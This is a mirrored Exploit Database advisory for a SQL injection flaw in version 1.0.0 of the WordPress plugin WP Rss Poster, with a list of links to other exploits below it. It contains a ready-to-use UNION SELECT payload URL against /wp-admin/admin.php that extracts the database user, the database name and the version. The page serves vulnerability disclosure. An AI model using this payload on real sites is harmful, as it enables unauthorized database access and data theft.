WordPress Plugin WP Rss Poster – ‘/wp-admin/admin.php’ SQL Injection

Exploit Database
19 阅读

作者： Anant Shrivastava

日期： 2014-05-28
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/39252/

source: https://www.securityfocus.com/bid/68557/info

WP Rss Poster plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

WP Rss Poster 1.0.0 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=wrp-add-new&id=2 union select 1,user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18

last Exploits
WordPress Plugin WP Rss Poster – ‘/wp-admin/admin.php’ SQL Injection的更多信息

online Chatting System 1.0 – ‘id’ SQL Injection：
Linksys EA7500 2.0.8.194281 – Cross-Site Scripting：
Joomla! Component com_tariff – SQL Injection：
D-Link DKVM-IP8 – Cross-Site Scripting：
Online AgroCulture Farm Management System 1.0 – ‘pid’ SQL Injection：
ProjectSend r754 – Insecure Direct Object Reference：
DZCP (deV!L`z Clanportal) 1.5.4 – Local File Inclusion：
eyeos 2.3 – Multiple Vulnerabilities：